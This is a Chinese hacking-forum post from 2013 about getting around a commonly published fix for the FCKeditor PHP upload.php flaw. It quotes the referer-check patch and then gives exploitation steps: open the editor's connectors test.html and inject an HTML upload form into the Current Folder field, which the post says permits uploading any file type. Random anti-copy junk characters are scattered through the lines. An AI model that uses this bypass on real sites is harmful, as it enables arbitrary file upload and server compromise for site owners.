找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2171|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php  Q* ]4 G8 v3 S
网上给出的修复方案是4 H8 G4 {' [4 N. y) F
修复方法,删除FCK编辑器用其他的编辑器9 t: z3 r1 k9 T4 S" C
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
+ ~6 R: q; i; B
! {* U- w4 ?/ Q! ?. H; \  Arequire(‘config.php’);" [7 [5 u2 W. `2 P* u
require(‘util.php’);
& O* J+ H( }" H: d. S  g的下面添加以下代码—————————–
+ U9 \' w: l, g//防止外部提交
& l+ b; ~% F% T% c: n, T& P' wfunction outsidepost()
% g/ m9 Q* ~7 ]& {6 q{
) e$ Q/ a5 ~7 T9 l. }: K, ~$servername=$_SERVER['SERVER_NAME'];
' y- _8 _7 u7 l$ ^; k/ G2 J% O, ^$sub_from=@$_SERVER['HTTP_REFERER'];' U$ ]$ v2 ~- J/ m2 f+ S! J
$sub_len=strlen($servername);
. Q$ z! [+ {4 m: M$checkfrom=substr($sub_from,7,$sub_len);, d# s) g5 u' f6 ?& O- T" z; Y: A
if($checkfrom!=$servername){
9 X2 N$ y7 @1 m% `: C  wecho(“you don’t outsidepost!”);) O( v) B5 y: c" v% |* k
exit;
4 t7 {5 B4 @$ G( I% m  h}* i% ^' U4 G8 t7 j/ Z' J
}) a- Y7 {, Y' B  I, o  ]0 @- r
outsidepost();
1 W6 ]' T  _$ K. S防止外部提交,但是没有防止内部提交,
' H( V6 J% v2 i! d# v利用方法:
" s7 t; `5 O7 M: y1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html- M  K3 c. H+ e( B- i( E
2,在Current Folder 框输入
6 m. r3 K5 ]2 J$ P7 t<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>$ T, p3 Z5 I0 @) q- e/ ]' \
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。/ V6 v3 V2 k) z. A- P5 r
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表